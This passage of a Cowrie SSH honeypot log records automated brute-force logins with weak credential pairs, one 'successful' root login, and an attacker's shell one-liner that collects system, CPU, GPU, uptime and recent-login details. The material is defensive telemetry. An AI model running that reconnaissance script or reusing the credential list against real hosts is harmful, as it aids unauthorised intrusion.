521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:55:45.683252Z","src_ip":"212.227.235.229","session":"a8a99a771f65"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:55:45.897030Z","src_ip":"212.227.235.229","session":"332a3a3d0f44"}
{"eventid":"cowrie.session.closed","duration":"3.4","message":"Connection lost after 3.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:55:46.438217Z","src_ip":"212.227.235.229","session":"62ab2b16edd1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34872,"dst_ip":"1.2.3.4","dst_port":22,"session":"ad23eda89a9b","protocol":"ssh","message":"New connection: 212.227.235.229:34872 (1.2.3.4:22) [session: ad23eda89a9b]","sensor":"my-vps","timestamp":"2025-08-31T04:55:46.463485Z"}
{"eventid":"cowrie.login.failed","username":"ftp","password":"tpuser","message":"login attempt [ftp/tpuser] failed","sensor":"my-vps","timestamp":"2025-08-31T04:55:46.577110Z","src_ip":"212.227.235.229","session":"d35aa32eb11c"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:55:46.600014Z","src_ip":"212.227.235.229","session":"ad23eda89a9b"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:55:46.722160Z","src_ip":"212.227.235.229","session":"ad23eda89a9b"}
{"eventid":"cowrie.login.failed","username":"ssh","password":"ssh","message":"login attempt [ssh/ssh] failed","sensor":"my-vps","timestamp":"2025-08-31T04:55:47.017410Z","src_ip":"212.227.235.229","session":"a8a99a771f65"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34882,"dst_ip":"1.2.3.4","dst_port":22,"session":"4b2d95d39481","protocol":"ssh","message":"New connection: 212.227.235.229:34882 (1.2.3.4:22) [session: 4b2d95d39481]","sensor":"my-vps","timestamp":"2025-08-31T04:55:47.709755Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:55:47.838754Z","src_ip":"212.227.235.229","session":"4b2d95d39481"}
{"eventid":"cowrie.session.closed","duration":"9.3","message":"Connection lost after 9.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:55:47.886468Z","src_ip":"212.227.235.229","session":"d35aa32eb11c"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:55:47.966823Z","src_ip":"212.227.235.229","session":"4b2d95d39481"}
{"eventid":"cowrie.login.failed","username":"shagrath","password":"039715582364317","message":"login attempt [shagrath/039715582364317] failed","sensor":"my-vps","timestamp":"2025-08-31T04:55:48.188750Z","src_ip":"212.227.235.229","session":"ad23eda89a9b"}
{"eventid":"cowrie.login.success","username":"root","password":"123456789","message":"login attempt [root/123456789] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:55:48.583750Z","src_ip":"212.227.235.229","session":"93c8ec9cb5b0"}
{"eventid":"cowrie.session.closed","duration":"3.5","message":"Connection lost after 3.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:55:48.954724Z","src_ip":"212.227.235.229","session":"a8a99a771f65"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:55:49.595595Z","src_ip":"212.227.235.229","session":"ad23eda89a9b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54512,"dst_ip":"1.2.3.4","dst_port":22,"session":"a49c3124a351","protocol":"ssh","message":"New connection: 212.227.125.160:54512 (1.2.3.4:22) [session: a49c3124a351]","sensor":"my-vps","timestamp":"2025-08-31T04:55:49.875931Z"}
{"eventid":"cowrie.session.closed","duration":"49.0","message":"Connection lost after 49.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:55:50.119721Z","src_ip":"212.227.235.229","session":"582b25949067"}
{"eventid":"cowrie.login.failed","username":"developer","password":"123456","message":"login attempt [developer/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T04:55:50.130890Z","src_ip":"212.227.235.229","session":"4b2d95d39481"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T04:55:50.787273Z","src_ip":"212.227.235.229","session":"93c8ec9cb5b0"}
{"eventid":"cowrie.command.input","input":"uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","message":"CMD: uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","sensor":"my-vps","timestamp":"2025-08-31T04:55:50.787951Z","src_ip":"212.227.235.229","session":"93c8ec9cb5b0"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-31T04:55:50.788727Z","src_ip":"212.227.235.229","session":"93c8ec9cb5b0"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-31T04:55:50.789727Z","src_ip":"212.227.235.229","session":"93c8ec9cb5b0"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-08-31T04:55:50.791258Z","src_ip":"212.227.235.229","session":"93c8ec9cb5b0"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-31T04:55:50.792042Z","src_ip":"212.227.235.229","session":"93c8ec9cb5b0"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-31T04:55:50.792834Z","src_ip":"212.227.235.229","session":"93c8ec9cb5b0"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-08-31T04:55:50.794029Z","src_ip":"212.227.235.229","session":"93c8ec9cb5b0"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-08-31T04:55:50.794626Z","src_ip":"212.227.235.229","session":"93c8ec9cb5b0"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-08-31T04:55:50.795134Z","src_ip":"212.227.235.229","session":"93c8ec9cb5b0"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-08-31T04:55:50.795664Z","src_ip":"212.227.235.229","session":"93c8ec9cb5b0"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-08-31T04:55:50.796342Z","src_ip":"212.227.235.229","session":"93c8ec9cb5b0"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-08-31T04:55:50.796833Z","src_ip":"212.227.235.229","session":"93c8ec9cb5b0"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:55:51.388785Z","src_ip":"212.227.235.229","session":"4b2d95d39481"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-08-31T04:55:51.612848Z","src_ip":"212.227.235.229","session":"93c8ec9cb5b0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","size":74,"shasum":"ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","duplicate":true,"duration":"0.8","message":"Closing TTY Log: var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:55:51.613807Z","src_ip":"212.227.235.229","session":"93c8ec9cb5b0"}
{"eventid":"cowrie.session.closed","duration":"9.6","message":"Connection lost after 9.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:55:51.614886Z","src_ip":"212.227.235.229","session":"93c8ec9cb5b0"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:55:55.745679Z","src_ip":"212.227.125.160","session":"a49c3124a351"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:55:55.800660Z","src_ip":"212.227.125.160","session":"a49c3124a351"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45304,"dst_ip":"1.2.3.4","dst_port":22,"session":"3ef72839c8c6","protocol":"ssh","message":"New connection: 212.227.125.160:45304 (1.2.3.4:22) [session: 3ef72839c8c6]","sensor":"my-vps","timestamp":"2025-08-31T04:55:56.130864Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:55:56.131837Z","src_ip":"212.227.125.160","session":"3ef72839c8c6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:55:56.323766Z","src_ip":"212.227.125.160","session":"3ef72839c8c6"}
{"eventid":"cowrie.login.failed","username":"wang","password":"123456","message":"login attempt [wang/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T04:55:56.902156Z","src_ip":"212.227.125.160","session":"3ef72839c8c6"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:55:58.096446Z","src_ip":"212.227.125.160","session":"3ef72839c8c6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46728,"dst_ip":"1.2.3.4","dst_port":22,"session":"a35813128eaa","protocol":"ssh","message":"New connection: 212.227.235.229:46728 (1.2.3.4:22) [session: a35813128eaa]","sensor":"my-vps","timestamp":"2025-08-31T04:56:02.439717Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:56:02.580308Z","src_ip":"212.227.235.229","session":"a35813128eaa"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49864,"dst_ip":"1.2.3.4","dst_port":22,"session":"8275d7d22ed8","protocol":"ssh","message":"New connection: 212.227.125.160:49864 (1.2.3.4:22) [session: 8275d7d22ed8]","sensor":"my-vps","timestamp":"2025-08-31T04:56:02.905002Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:56:03.453528Z","src_ip":"212.227.125.160","session":"8275d7d22ed8"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-he